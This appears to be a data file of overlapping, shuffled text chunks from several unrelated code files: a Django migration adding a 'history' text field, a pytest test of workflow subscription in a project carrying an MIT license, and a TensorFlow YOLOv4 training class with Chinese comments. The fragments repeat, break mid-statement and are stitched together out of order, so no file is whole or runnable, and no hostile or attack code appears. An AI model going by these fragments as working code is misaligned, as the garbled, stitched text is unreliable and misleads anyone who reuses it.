"[ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write summary here.'),", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations =", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations", "'0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write summary here.'), ), ]", "Django 3.2.8 on 2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations = [" ]
[ "Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\"", "NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE", "publish, distribute, sublicense, and/or sell # copies of the Software, and to permit", "%r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 0,", "software and associated documentation files (the \"Software\"), to deal # in the Software", "copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED", "\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT", "TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.", "WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT", "OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN", "CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #", "portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT", "do so, subject to the following conditions: # # The above copyright notice", "assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 0, \"Unexpected number", "EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,", "and to permit persons to whom the Software is # furnished to do", "OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION", "use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the", "the Software without restriction, including without limitation the rights # to use, copy,", "ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN", "without restriction, including without limitation the rights # to use, copy, modify, merge,", "the following conditions: # # The above copyright notice and this permission notice", "THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR", "valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert", "person obtaining a copy # of this software and associated documentation files (the", "LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND", "# furnished to do so, subject to the following conditions: # # The", "the Software, and to permit persons to whom the Software is # furnished", "permit persons to whom the Software is # furnished to do so, subject", "rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #", "THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import", "\"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s,", "Permission is hereby granted, free of charge, to any person obtaining a copy", "s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be", "lifemonitor.auth.models import Subscription, User from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1:", "THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR", "A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE # AUTHORS OR", "SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #", "FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF", "user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions)", "in the Software without restriction, including without limitation the rights # to use,", "IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT", "EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,", "Software without restriction, including without limitation the rights # to use, copy, modify,", "# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies", "merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to", "logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User", "%r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 1,", "== 1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s)", "PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS", "OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING", "ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE", "user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s,", "copies of the Software, and to permit persons to whom the Software is", "should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s:", "s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 0, \"Unexpected", "SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import logging", "# The above copyright notice and this permission notice shall be included in", "logging from lifemonitor.auth.models import Subscription, User from tests import utils logger = logging.getLogger()", "included in all # copies or substantial portions of the Software. # #", "import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow =", "Copyright (c) 2020-2021 CRS4 # # Permission is hereby granted, free of charge,", "# of this software and associated documentation files (the \"Software\"), to deal #", "to do so, subject to the following conditions: # # The above copyright", "OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR", "Subscription, User from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow:", "is hereby granted, free of charge, to any person obtaining a copy #", "above copyright notice and this permission notice shall be included in all #", "_, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow)", "persons to whom the Software is # furnished to do so, subject to", "sell # copies of the Software, and to permit persons to whom the", "WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE.", "conditions: # # The above copyright notice and this permission notice shall be", "substantial portions of the Software. 
# # THE SOFTWARE IS PROVIDED \"AS IS\",", "INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A", "# SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from tests import utils", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE", "AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR", "empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow)", "OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,", "user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not", "documentation files (the \"Software\"), to deal # in the Software without restriction, including", "s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be", "to permit persons to whom the Software is # furnished to do so,", "ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT,", "or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS", "utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s)", "= logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user:", "# Copyright (c) 2020-2021 CRS4 # # Permission is hereby granted, free of", "2020-2021 CRS4 # # Permission is hereby granted, free of charge, to any", "notice shall be included in all # copies or substantial portions of the", "restriction, including without limitation the rights # to use, copy, modify, merge, publish,", "obtaining a copy # of this software and associated documentation files (the \"Software\"),", "of charge, to any person obtaining a copy # of this software and", "whom the Software is # furnished to do so, subject to the following", "= user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should", "CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH", "NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE", "FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS", "s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected", "# # Permission is hereby granted, free of charge, to any person obtaining", "MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL", "free of charge, to any person obtaining a copy # of this software", "from lifemonitor.auth.models import Subscription, User from tests import utils logger = logging.getLogger() def", "User from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str):", "shall be included in all # copies or substantial portions of the Software.", "PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT", "copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software,", "OTHER DEALINGS IN THE # SOFTWARE. 
import logging from lifemonitor.auth.models import Subscription, User", "The above copyright notice and this permission notice shall be included in all", "BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR", "and/or sell # copies of the Software, and to permit persons to whom", "so, subject to the following conditions: # # The above copyright notice and", "this permission notice shall be included in all # copies or substantial portions", "LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION", "workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription:", "assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number", "logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow)", "FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE", "OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT", "without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense,", "# copies or substantial portions of the Software. # # THE SOFTWARE IS", "PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING", "\"Subscription should not be empty\" assert len(user.subscriptions) == 0, \"Unexpected number of subscriptions\"", "# in the Software without restriction, including without limitation the rights # to", "is # furnished to do so, subject to the following conditions: # #", "logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) ==", "files (the \"Software\"), to deal # in the Software without restriction, including without", "Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY", "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS", "str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription =", "copy # of this software and associated documentation files (the \"Software\"), to deal", "IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE", "Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\"", "to the following conditions: # # The above copyright notice and this permission", "TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE", "to deal # in the Software without restriction, including without limitation the rights", "the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell", "to any person obtaining a copy # of this software and associated documentation", "OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import logging from", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS", "of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should", "following conditions: # # The above copyright notice and this permission notice shall", "USE OR OTHER DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models import", "of the Software, and to permit persons to whom the Software is #", "in all # copies or substantial portions of the Software. # # THE", "the Software. 
# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF", "be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription =", "subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not", "and associated documentation files (the \"Software\"), to deal # in the Software without", "OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #", "= utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\",", "user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions)", "(c) 2020-2021 CRS4 # # Permission is hereby granted, free of charge, to", "any person obtaining a copy # of this software and associated documentation files", "test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user']", "THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN", "# # The above copyright notice and this permission notice shall be included", "dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s:", "IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR", "def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User =", "s, \"Subscription should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of", "CRS4 # # Permission is hereby granted, free of charge, to any person", "\"Software\"), to deal # in the Software without restriction, including without limitation the", "OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE", "LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #", "FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #", "SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES", "1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert", "BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN", "from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _,", "AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE", "IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED,", "assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription:", "sublicense, and/or sell # copies of the Software, and to permit persons to", "a copy # of this software and associated documentation files (the \"Software\"), to", "deal # in the Software without restriction, including without limitation the rights #", "Software is # furnished to do so, subject to the following conditions: #", "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR", "Software, and to permit persons to whom the Software is # furnished to", "OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER", "HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN", "CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT", "including without limitation the rights # to use, copy, modify, merge, publish, distribute,", "OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE", "\"Subscription should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\"", "THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from tests import", "all # copies or substantial portions of the Software. # # THE SOFTWARE", "number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription", "AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #", "(the \"Software\"), to deal # in the Software without restriction, including without limitation", "this software and associated documentation files (the \"Software\"), to deal # in the", "not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription", "s, \"Subscription should not be empty\" assert len(user.subscriptions) == 0, \"Unexpected number of", "IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR", "copyright notice and this permission notice shall be included in all # copies", "IN THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from tests", "distribute, sublicense, and/or sell # copies of the Software, and to permit persons", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER", "utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1,", "charge, to any person obtaining a copy # of this software and associated", "associated documentation files (the \"Software\"), to deal # in the Software without restriction,", "SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from tests import utils logger", "WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO", "OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY,", "hereby granted, free of charge, to any person obtaining a copy # of", "of this software and associated documentation files (the \"Software\"), to deal # in", "of the Software. 
# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY", "OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS", "= user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert", "granted, free of charge, to any person obtaining a copy # of this", "# copies of the Software, and to permit persons to whom the Software", "# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,", "WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO", "= user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert", "DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR", "WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED", "KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF", "THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models", "to whom the Software is # furnished to do so, subject to the", "limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or", "tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow", "valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription", "permission notice shall be included in all # copies or substantial portions of", "User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription", "len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\",", "furnished to do so, subject to the following conditions: # # The above", "and this permission notice shall be included in all # copies or substantial", "modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and", "ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES", "be included in all # copies or substantial portions of the Software. #", "NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY", "COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,", "DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from", "import logging from lifemonitor.auth.models import Subscription, User from tests import utils logger =", "# Permission is hereby granted, free of charge, to any person obtaining a", "OR OTHER DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription,", "to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of", "import Subscription, User from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict,", "IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF", "the Software is # furnished to do so, subject to the following conditions:", "subject to the following conditions: # # The above copyright notice and this", "notice and this permission notice shall be included in all # copies or" ]
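# The test above relies on a small contract: User.subscribe(workflow) creates
# and returns a Subscription and records it in user.subscriptions, while
# User.unsubscribe(workflow) removes the matching entry and returns the removed
# object. A minimal in-memory sketch of that contract (an illustration added
# here, not the actual lifemonitor.auth.models implementation):

class SketchUser:
    def __init__(self):
        self.subscriptions = []

    def subscribe(self, resource):
        # Create, record, and return the subscription object.
        subscription = (self, resource)
        self.subscriptions.append(subscription)
        return subscription

    def unsubscribe(self, resource):
        # Remove and return the subscription matching this resource.
        subscription = next(s for s in self.subscriptions if s[1] == resource)
        self.subscriptions.remove(subscription)
        return subscription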
[ "train_epochs): step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1", "datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def", "# 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch", "train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch", "% save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if", "txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET() return net def loss_generator(self):", "use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据", "loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96,", "utf-8 -*- # @Time : 2020/5/14 上午10:50 # @Author : xiao9616 # @Email", "src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss", "decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean()", "train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET() return net", "format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): '''", "to use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" #", "= 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images, boxes", "= -1 print(\"train model from init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer", "2020/5/14 上午10:50 # @Author : xiao9616 # @Email : <EMAIL> # @File :", "import tensorflow as tf import os from src.yolo4.config import * from src.yolo4.util import", "src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s", "print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result()", "images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as", "self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {}", "y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss:", "batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch),", "tensorflow as tf import os from src.yolo4.config import * from src.yolo4.util import *", "lr_schedule 
= tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer", ") optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric", "禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net", "# 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path", "self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step = 0", "def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for", "import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s", "step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images,", "epoch in range(fine_tune_epoch + 1, train_epochs): step = 0 for train_dataset_batch in train_dataset:", "import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b", "with tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients =", "net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch))", "@Software: PyCharm # ============================================ import logging import tensorflow as tf import os from", "xiao9616 # @Email : <EMAIL> # @File : BaseModel.py # @Software: PyCharm #", "网络结构 net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path +", "net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model", "class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data =", "= 0 for _ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return", "net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ == '__main__': yolo", "设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") #", "from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S',", ": <EMAIL> # @File : BaseModel.py # @Software: PyCharm # ============================================ import logging", "* from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS", "import logging import tensorflow as tf import os from src.yolo4.config import * from", "in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self):", "= txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = 
YOLO4_NET() return net def", "YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True )", "\"-1\" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net = self.net_generator() net.summary()", "if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1", "optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch in", ": BaseModel.py # @Software: PyCharm # ============================================ import logging import tensorflow as tf", "train_dataset, train_count = self.data_generator() # 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch #", "print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch =", "%(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法:", "return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer", "= self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() #", "+ \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from", "# 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1,", "\"-1\" logging.info(\"not found gpu 